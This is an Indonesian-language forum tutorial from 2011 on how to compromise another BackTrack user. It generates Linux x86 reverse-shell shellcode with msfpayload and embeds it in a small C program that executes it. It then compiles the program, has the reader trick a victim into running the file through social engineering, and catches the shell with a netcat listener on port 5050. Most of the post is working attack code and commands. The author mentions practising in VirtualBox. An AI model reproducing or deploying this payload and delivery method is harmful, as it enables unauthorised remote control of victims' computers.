11-15-2011, 03:25 PM
Ini adalah thread tutorial saya yang pertama disini, maklum masih baru-baru juga belajar pake Backtrack, dan maaf kan juga kalau repost. Seperti yang sahabat ketahui backtrack adalah sebuah sistem operasi yang banyak digunakan untuk melakukan kegiatan penetrasi sistem, trus bagaimana kalau sipengguna Backtrack sendiri yang diexploitasi oleh pengguna Backtrack yang lain. Disini kita dituntut untuk dapat menggunakan tehnik Social Engginer. Disini saya menggunakan Virtual Box agar selama latihan tidak merugikan orang lain, oke kita langsung kepada step-stepnya.
1. Dapatkan kode exploit.
2. Buat file exploit.
buka gedit kemudian copy hasil dari kode exploit yang kita dapatkan.
edit menjadi seperti sibawah ini.
simpan dengan nama exploitbacktrack.c
3. Compile file exploit.
4. Gunakan Social Engginer agar file exploit melayang kepada komputer target.
5. Buka terminal baru dan buat listener untuk menunggu file exploit kita dieksekusi.
6. Dan Bang bang bang Pawned !!
1. Dapatkan kode exploit.
Code:
root@bt:~# cd /pentest/exploits/framework/
root@bt:/pentest/exploits/framework# msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.43.66 LPORT=5050 C
/*
* linux/x86/shell_reverse_tcp - 71 bytes
* http://www.metasploit.com
* VERBOSE=false, LHOST=192.168.43.66, LPORT=5050,
* ReverseConnectRetries=5, PrependSetresuid=false,
* PrependSetreuid=false, PrependSetuid=false,
* PrependChrootBreak=false, AppendExit=false,
* InitialAutoRunScript=, AutoRunScript=
*/
unsigned char buf[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x68\xc0\xa8\x2b\x42\x66\x68\x13\xba\x66\x53\x6a\x10"
"\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f"
"\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
root@bt:/pentest/exploits/framework#
2. Buat file exploit.
buka gedit kemudian copy hasil dari kode exploit yang kita dapatkan.
edit menjadi seperti sibawah ini.
Code:
unsigned char buf[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x68\xc0\xa8\x2b\x42\x66\x68\x13\xba\x66\x53\x6a\x10"
"\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f"
"\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
int main(int argc, char **argv)
{
int (*funct)();
funct = (int (*)()) buf;
(int)(*funct)();
}
simpan dengan nama exploitbacktrack.c
3. Compile file exploit.
Code:
root@bt:~# gcc -o exploitbacktrack exploitbacktrack.c
root@bt:~#
4. Gunakan Social Engginer agar file exploit melayang kepada komputer target.
5. Buka terminal baru dan buat listener untuk menunggu file exploit kita dieksekusi.
Code:
root@bt:~# nc -lvp 5050
6. Dan Bang bang bang Pawned !!